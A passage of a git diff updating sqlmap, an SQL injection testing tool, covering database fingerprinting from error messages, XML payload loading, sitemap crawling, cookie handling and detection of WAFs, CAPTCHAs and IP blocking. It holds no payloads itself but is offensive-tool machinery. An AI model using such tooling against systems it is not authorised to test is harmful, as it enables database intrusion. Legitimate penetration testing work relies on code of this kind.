os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), + "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), + "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), + "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), + "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), + "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): - value = headers[header] - xmlfile = kb.headerPaths[header] - checkFile(xmlfile) - - handler = FingerprintHandler(value, kb.headersFp) - - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) + for header, xmlfile in kb.headerPaths.items(): + if header in headers: + handler = FingerprintHandler(headers[header], kb.headersFp) + parseXmlFile(xmlfile, handler) + parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/html.py b/lib/parse/html.py index 367276ba5e2..38001235485 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,18 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler -from lib.core.common import checkFile +from lib.core.common import urldecode from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD from lib.core.threads import getCurrentThreadData class HTMLHandler(ContentHandler): @@ -25,7 +26,12 @@ def __init__(self, page): ContentHandler.__init__(self) self._dbms = None - self._page = page + self._page = (page or "") + try: + self._lower_page = self._page.lower() + except SystemError: # https://bugs.python.org/issue18183 + self._lower_page = None + self._urldecoded_page = urldecode(self._page) self.dbms = None @@ -34,23 +40,51 @@ def _markAsErrorPage(self): threadData.lastErrorPage = (threadData.lastRequestUID, self._page) def startElement(self, name, attrs): + if self.dbms: + return + if name == "dbms": self._dbms = attrs.get("value") elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): + regexp = attrs.get("regexp") + if regexp not in kb.cache.regex: + keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp)) + keywords = sorted(keywords, key=len) + kb.cache.regex[regexp] = keywords[-1].lower() + + if ('|' in regexp or kb.cache.regex[regexp] in (self._lower_page or kb.cache.regex[regexp])) and re.search(regexp, self._urldecoded_page, re.I): self.dbms = self._dbms self._markAsErrorPage() + kb.forkNote = kb.forkNote or attrs.get("fork") def htmlParser(page): """ This function calls a class that parses the input HTML page to fingerprint the back-end database management system + + >>> from lib.core.enums import DBMS + >>> htmlParser("Warning: mysql_fetch_array() expects parameter 1 to be resource") == DBMS.MYSQL + True + >>> threadData = getCurrentThreadData() + >>> threadData.lastErrorPage = None """ + page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD] + xmlfile = paths.ERRORS_XML - checkFile(xmlfile) handler = HTMLHandler(page) + key = hash(page) + + # generic SQL warning/error messages + if re.search(r"SQL (warning|error|syntax)", page, re.I): + handler._markAsErrorPage() + + if key in kb.cache.parsedDbms: + retVal = kb.cache.parsedDbms[key] + if retVal: + handler._markAsErrorPage() + return retVal parseXmlFile(xmlfile, handler) @@ -60,8 +94,6 @@ def htmlParser(page): else: kb.lastParserStatus = None - # generic SQL warning/error messages - if re.search(r"SQL (warning|error|syntax)", page, re.I): - handler._markAsErrorPage() + kb.cache.parsedDbms[key] = handler.dbms return handler.dbms diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index fe2befb0533..24ee83e1a6d 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,28 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os +import re + from xml.etree import ElementTree as et +from lib.core.common import getSafeExString +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import paths from lib.core.datatype import AttribDict +from lib.core.exception import SqlmapInstallationException +from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') - if isinstance(text, basestring): - text = int(text) if text.isdigit() else str(text) + if hasattr(text, "isdigit") and text.isdigit(): + text = int(text) elif isinstance(text, list): count = 0 for _ in text: - text[count] = int(_) if _.isdigit() else str(_) + text[count] = int(_) if _.isdigit() else _ count += 1 if len(text) == 1 and tag not in ("clause", "where"): @@ -31,10 +41,10 @@ def cleanupVals(text, tag): return text def parseXmlNode(node): - for element in node.getiterator('boundary'): + for element in node.findall("boundary"): boundary = AttribDict() - for child in element.getchildren(): + for child in element.findall("*"): if child.text: values = cleanupVals(child.text, child.tag) boundary[child.tag] = values @@ -43,21 +53,22 @@ def parseXmlNode(node): conf.boundaries.append(boundary) - for element in node.getiterator('test'): + for element in node.findall("test"): test = AttribDict() - for child in element.getchildren(): + for child in element.findall("*"): if child.text and child.text.strip(): values = cleanupVals(child.text, child.tag) test[child.tag] = values else: - if len(child.getchildren()) == 0: + progeny = child.findall("*") + if len(progeny) == 0: test[child.tag] = None continue else: test[child.tag] = AttribDict() - for gchild in child.getchildren(): + for gchild in progeny: if gchild.tag in test[child.tag]: prevtext = test[child.tag][gchild.tag] test[child.tag][gchild.tag] = [prevtext, gchild.text] @@ -66,7 +77,47 @@ def parseXmlNode(node): conf.tests.append(test) -def loadPayloads(): - doc = et.parse(paths.PAYLOADS_XML) +def loadBoundaries(): + """ + Loads boundaries from XML + + >>> conf.boundaries = [] + >>> loadBoundaries() + >>> len(conf.boundaries) > 0 + True + """ + + try: + doc = et.parse(paths.BOUNDARIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + root = doc.getroot() parseXmlNode(root) + +def loadPayloads(): + """ + Loads payloads/tests from XML + + >>> conf.tests = [] + >>> loadPayloads() + >>> len(conf.tests) > 0 + True + """ + + for payloadFile in PAYLOAD_XML_FILES: + payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) + + try: + doc = et.parse(payloadFilePath) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + + root = doc.getroot() + parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py new file mode 100644 index 00000000000..6081d1088c5 --- /dev/null +++ b/lib/parse/sitemap.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import readInput +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.exception import SqlmapSyntaxException +from lib.request.connect import Connect as Request +from thirdparty.six.moves import http_client as _http_client + +abortedFlag = None + +def parseSitemap(url, retVal=None): + global abortedFlag + + if retVal is not None: + logger.debug("parsing sitemap '%s'" % url) + + try: + if retVal is None: + abortedFlag = False + retVal = OrderedSet() + + try: + content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" + except _http_client.InvalidURL: + errMsg = "invalid URL given for sitemap ('%s')" % url + raise SqlmapSyntaxException(errMsg) + + for match in re.finditer(r"\s*([^<]+)", content or ""): + if abortedFlag: + break + url = match.group(1).strip() + if url.endswith(".xml") and "sitemap" in url.lower(): + if kb.followSitemapRecursion is None: + message = "sitemap recursion detected. Do you want to follow? [y/N] " + kb.followSitemapRecursion = readInput(message, default='N', boolean=True) + if kb.followSitemapRecursion: + parseSitemap(url, retVal) + else: + retVal.add(url) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during sitemap parsing. sqlmap " + warnMsg += "will use partial list" + logger.warning(warnMsg) + + return retVal diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/request/basic.py b/lib/request/basic.py index e9130fe7b27..758f993ca61 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,44 +1,67 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import codecs import gzip +import io import logging import re -import StringIO -import struct import zlib +from lib.core.common import Backend from lib.core.common import extractErrorMessage from lib.core.common import extractRegexResult -from lib.core.common import getUnicode +from lib.core.common import filterNone +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import isListLike +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage +from lib.core.common import unArrayizeValue +from lib.core.convert import decodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger -from lib.core.enums import HTTPHEADER +from lib.core.decorators import cachedmethod +from lib.core.decorators import lockedmethod +from lib.core.dicts import HTML_ENTITIES +from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PLACE from lib.core.exception import SqlmapCompressionException -from lib.core.htmlentities import htmlEntities +from lib.core.settings import BLOCKED_IP_REGEX from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD +from lib.core.settings import IDENTYWAF_PARSE_LIMIT from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import ML from lib.core.settings import META_CHARSET_REGEX from lib.core.settings import PARSE_HEADERS_LIMIT +from lib.core.settings import PRINTABLE_BYTES +from lib.core.settings import SELECT_FROM_TABLE_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VIEWSTATE_REGEX from lib.parse.headers import headersParser from lib.parse.html import htmlParser +from thirdparty import six from thirdparty.chardet import detect +from thirdparty.identywaf import identYwaf +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client -def forgeHeaders(items=None): +@lockedmethod +def forgeHeaders(items=None, base=None): """ Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing the HTTP requests @@ -46,51 +69,78 @@ def forgeHeaders(items=None): items = items or {} - for _ in items.keys(): + for _ in list(items.keys()): if items[_] is None: del items[_] - headers = dict(conf.httpHeaders) - headers.update(items or {}) + headers = OrderedDict(conf.httpHeaders if base is None else base) + headers.update(items.items()) - headers = dict(("-".join(_.capitalize() for _ in key.split('-')), value) for (key, value) in headers.items()) + class _str(str): + def capitalize(self): + return _str(self) + + def title(self): + return _str(self) + + _ = headers + headers = OrderedDict() + for key, value in _.items(): + success = False + + for _ in headers: + if _.upper() == key.upper(): + del headers[_] + break + + if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): + try: + headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 + except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) + pass + else: + success = True + if not success: + key = '-'.join(_.capitalize() for _ in key.split('-')) + headers[key] = value if conf.cj: - if HTTPHEADER.COOKIE in headers: + if HTTP_HEADER.COOKIE in headers: for cookie in conf.cj: - if ("%s=" % cookie.name) in headers[HTTPHEADER.COOKIE]: - if kb.mergeCookies is None: - message = "you provided a HTTP %s header value. " % HTTPHEADER.COOKIE - message += "The target url provided its own cookies within " - message += "the HTTP %s header which intersect with yours. " % HTTPHEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? [Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") - - if kb.mergeCookies: - _ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, cookie.value), x) - headers[HTTPHEADER.COOKIE] = _(headers[HTTPHEADER.COOKIE]) + if cookie is None or cookie.domain_specified and not (conf.hostname or "").endswith(cookie.domain): + continue + + if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]): + if conf.loadCookies: + conf.httpHeaders = filterNone((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders) + elif kb.mergeCookies is None: + message = "you provided a HTTP %s header value, while " % HTTP_HEADER.COOKIE + message += "target URL provides its own cookies within " + message += "HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE + message += "Do you want to merge them in further requests? [Y/n] " + + kb.mergeCookies = readInput(message, default='Y', boolean=True) + + if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: + def _(value): + return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value) + + headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) - conf.httpHeaders = [(item[0], item[1] if item[0] != HTTPHEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] + conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] elif not kb.testMode: - headers[HTTPHEADER.COOKIE] += "%s %s=%s" % (DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value) + headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value)) - if kb.testMode: + if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): resetCookieJar(conf.cj) - if kb.redirectSetCookie and not conf.dropSetCookie: - if HTTPHEADER.COOKIE in headers: - headers[HTTPHEADER.COOKIE] += "%s %s" % (DEFAULT_COOKIE_DELIMITER, kb.redirectSetCookie) - else: - headers[HTTPHEADER.COOKIE] = kb.redirectSetCookie - return headers -def parseResponse(page, headers): +def parseResponse(page, headers, status=None): """ @param page: the page to parse to feed the knowledge base htmlFp (back-end DBMS fingerprint based upon DBMS error messages return @@ -102,34 +152,57 @@ def parseResponse(page, headers): headersParser(headers) if page: - htmlParser(page) + htmlParser(page if not status else "%s\n\n%s" % (status, page)) +@cachedmethod def checkCharEncoding(encoding, warn=True): + """ + Checks encoding name, repairs common misspellings and adjusts to + proper namings used in codecs module + + >>> checkCharEncoding('iso-8858', False) + 'iso8859-1' + >>> checkCharEncoding('en_us', False) + 'utf8' + """ + + if isinstance(encoding, six.binary_type): + encoding = getUnicode(encoding) + + if isListLike(encoding): + encoding = unArrayizeValue(encoding) + if encoding: encoding = encoding.lower() else: return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() + encoding = encoding.replace(""", "") + # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 + elif "8895" in encoding: + encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 elif "2313" in encoding: encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 - elif "x-euc" in encoding: - encoding = encoding.replace("x-euc", "euc") # x-euc-kr -> euc-kr + elif encoding.startswith("x-"): + encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish + elif "windows-cp" in encoding: + encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 # name adjustment for compatibility if encoding.startswith("8859"): @@ -148,122 +221,194 @@ def checkCharEncoding(encoding, warn=True): encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" + elif encoding.find("utf-8") > 0: + encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*"): + elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: codecs.lookup(encoding) - except LookupError: - if warn: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to %s." % ML - singleTimeLogMessage(warnMsg, logging.WARN, encoding) + except: encoding = None + if encoding: + try: + six.text_type(getBytes(randomStr()), encoding) + except: + if warn: + warnMsg = "invalid web page charset '%s'" % encoding + singleTimeLogMessage(warnMsg, logging.WARN, encoding) + encoding = None + return encoding +@lockedmethod def getHeuristicCharEncoding(page): """ Returns page encoding charset detected by usage of heuristics - Reference: http://chardet.feedparser.org/docs/ + + Reference: https://chardet.readthedocs.io/en/latest/usage.html + + >>> getHeuristicCharEncoding(b"") + 'ascii' """ - retVal = detect(page)["encoding"] - infoMsg = "heuristics detected web page charset '%s'" % retVal - singleTimeLogMessage(infoMsg, logging.INFO, retVal) + key = (len(page), hash(page)) + + retVal = kb.cache.encoding.get(key) + if retVal is None: + retVal = detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])["encoding"] + kb.cache.encoding[key] = retVal + + if retVal and retVal.lower().replace('-', "") == UNICODE_ENCODING.lower().replace('-', ""): + infoMsg = "heuristics detected web page charset '%s'" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, retVal) return retVal -def decodePage(page, contentEncoding, contentType): +def decodePage(page, contentEncoding, contentType, percentDecode=True): """ Decode compressed/charset HTTP response + + >>> getText(decodePage(b"foo&bar", None, "text/html; charset=utf-8")) + 'foo&bar' + >>> getText(decodePage(b" ", None, "text/html; charset=utf-8")) + '\\t' """ if not page or (conf.nullConnection and len(page) < 2): return getUnicode(page) - if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"): + contentEncoding = getText(contentEncoding).lower() if contentEncoding else "" + contentType = getText(contentType).lower() if contentType else "" + + if contentEncoding in ("gzip", "x-gzip", "deflate"): if not kb.pageCompress: return None try: - if contentEncoding.lower() == "deflate": - data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations + if contentEncoding == "deflate": + obj = zlib.decompressobj(-15) + page = obj.decompress(page, MAX_CONNECTION_TOTAL_SIZE + 1) + page += obj.flush() + if len(page) > MAX_CONNECTION_TOTAL_SIZE: + raise Exception("size too large") else: - data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page)) - size = struct.unpack(" MAX_CONNECTION_TOTAL_SIZE: + data = gzip.GzipFile("", "rb", 9, io.BytesIO(page)) + page = data.read(MAX_CONNECTION_TOTAL_SIZE + 1) + if len(page) > MAX_CONNECTION_TOTAL_SIZE: raise Exception("size too large") + except Exception as ex: + if b" 255 else _.group(0), page) + if isinstance(page, six.binary_type) and "text/" in contentType: + if not kb.disableHtmlDecoding: + # e.g. Ãëàâà + if b"&#" in page: + page = re.sub(b"&#x([0-9a-f]{1,2});", lambda _: decodeHex(_.group(1) if len(_.group(1)) == 2 else b"0%s" % _.group(1)), page) + page = re.sub(b"&#(\\d{1,3});", lambda _: six.int2byte(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page) + + # e.g. %20%28%29 + if percentDecode: + if b"%" in page: + page = re.sub(b"%([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), page) + page = re.sub(b"%([0-9A-F]{2})", lambda _: decodeHex(_.group(1)), page) # Note: %DeepSee_SQL in CACHE + + # e.g. & + page = re.sub(b"&([^;]+);", lambda _: six.int2byte(HTML_ENTITIES[getText(_.group(1))]) if HTML_ENTITIES.get(getText(_.group(1)), 256) < 256 else _.group(0), page) + + kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) + + if (kb.pageEncoding or "").lower() == "utf-8-sig": + kb.pageEncoding = "utf-8" + if page and page.startswith(b"\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling) + page = page[3:] + + page = getUnicode(page, kb.pageEncoding) + + # e.g. ’…™ + if "&#" in page: + def _(match): + retVal = match.group(0) + try: + retVal = _unichr(int(match.group(1))) + except (ValueError, OverflowError): + pass + return retVal + page = re.sub(r"&#(\d+);", _, page) + + # e.g. ζ + page = re.sub(r"&([^;]+);", lambda _: _unichr(HTML_ENTITIES[_.group(1)]) if HTML_ENTITIES.get(_.group(1), 0) > 255 else _.group(0), page) + else: + page = getUnicode(page, kb.pageEncoding) return page -def processResponse(page, responseHeaders): +def processResponse(page, responseHeaders, code=None, status=None): kb.processResponseCounter += 1 + page = page or "" - if not kb.dumpTable: - parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None) + parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status) + + if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,): + kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page) + else: + kb.tableFrom = None if conf.parseErrors: msg = extractErrorMessage(page) if msg: - logger.info("parsed error message: '%s'" % msg) + logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.')) + + if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT: + rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD]) + + with kb.locks.identYwaf: + identYwaf.non_blind.clear() + try: + if identYwaf.non_blind_check(rawResponse, silent=True): + for waf in set(identYwaf.non_blind): + if waf not in kb.identifiedWafs: + kb.identifiedWafs.add(waf) + errMsg = "WAF/IPS identified as '%s'" % identYwaf.format_name(waf) + singleTimeLogMessage(errMsg, logging.CRITICAL) + except Exception as ex: + singleTimeWarnMessage("internal error occurred in WAF/IPS detection ('%s')" % getSafeExString(ex)) if kb.originalPage is None: for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): @@ -273,5 +418,37 @@ def processResponse(page, responseHeaders): if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: if conf.paramDict[PLACE.POST][name] in page: continue - conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST]) + else: + msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name + + if not readInput(msg, default='N', boolean=True): + continue + + conf.paramDict[PLACE.POST][name] = value + conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST]) + + if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): + kb.browserVerification = True + warnMsg = "potential browser verification protection mechanism detected" + if re.search(r"(?i)CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""): + for match in re.finditer(r"(?si)", page): + if re.search(r"(?i)captcha", match.group(0)): + kb.captchaDetected = True + break + + if re.search(r"]+\brefresh\b[^>]+\bcaptcha\b", page): + kb.captchaDetected = True + + if kb.captchaDetected: + warnMsg = "potential CAPTCHA protection mechanism detected" + if re.search(r"(?i)[^<]*CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if re.search(BLOCKED_IP_REGEX, page): + warnMsg = "it appears that you have been blocked by the target server" + singleTimeWarnMessage(warnMsg) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 0631debad0b..878e5a8a54b 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 +from thirdparty.six.moves import urllib as _urllib -class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler): +class SmartHTTPBasicAuthHandler(_urllib.request.HTTPBasicAuthHandler): """ Reference: http://selenic.com/hg/rev/6c51a5056020 Fix for a: http://bugs.python.org/issue8797 """ + def __init__(self, *args, **kwargs): - urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) + _urllib.request.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) self.retried_req = set() self.retried_count = 0 @@ -30,10 +31,8 @@ def http_error_auth_reqed(self, auth_header, host, req, headers): self.retried_count = 0 else: if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) + raise _urllib.error.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) else: self.retried_count += 1 - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) + return _urllib.request.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers) diff --git a/lib/request/certhandler.py b/lib/request/certhandler.py deleted file mode 100644 index 9723990e280..00000000000 --- a/lib/request/certhandler.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import urllib2 -import sys - -from lib.core.data import conf - -class HTTPSCertAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file, cert_file): - urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file - self.cert_file = cert_file - - def https_open(self, req): - return self.do_open(self.getConnection, req) - - def getConnection(self, host): - if sys.version_info >= (2, 6): - retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout) - else: - retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file) - return retVal diff --git a/lib/request/chunkedhandler.py b/lib/request/chunkedhandler.py new file mode 100644 index 00000000000..573f3b3d032 --- /dev/null +++ b/lib/request/chunkedhandler.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import conf +from lib.core.enums import HTTP_HEADER +from thirdparty.six.moves import urllib as _urllib + +class ChunkedHandler(_urllib.request.HTTPHandler): + """ + Ensures that HTTPHandler is working properly in case of Chunked Transfer-Encoding + """ + + def _http_request(self, request): + host = request.get_host() if hasattr(request, "get_host") else request.host + if not host: + raise _urllib.error.URLError("no host given") + + if request.data is not None: # POST + data = request.data + if not request.has_header(HTTP_HEADER.CONTENT_TYPE): + request.add_unredirected_header(HTTP_HEADER.CONTENT_TYPE, "application/x-www-form-urlencoded") + if not request.has_header(HTTP_HEADER.CONTENT_LENGTH) and not conf.chunked: + request.add_unredirected_header(HTTP_HEADER.CONTENT_LENGTH, "%d" % len(data)) + + sel_host = host + if request.has_proxy(): + sel_host = _urllib.parse.urlsplit(request.get_selector()).netloc + + if not request.has_header(HTTP_HEADER.HOST): + request.add_unredirected_header(HTTP_HEADER.HOST, sel_host) + for name, value in self.parent.addheaders: + name = name.capitalize() + if not request.has_header(name): + request.add_unredirected_header(name, value) + return request + + http_request = _http_request diff --git a/lib/request/comparison.py b/lib/request/comparison.py index f5ac9f2d4e3..4d1f3edce49 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,18 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import division + import re from lib.core.common import extractRegexResult from lib.core.common import 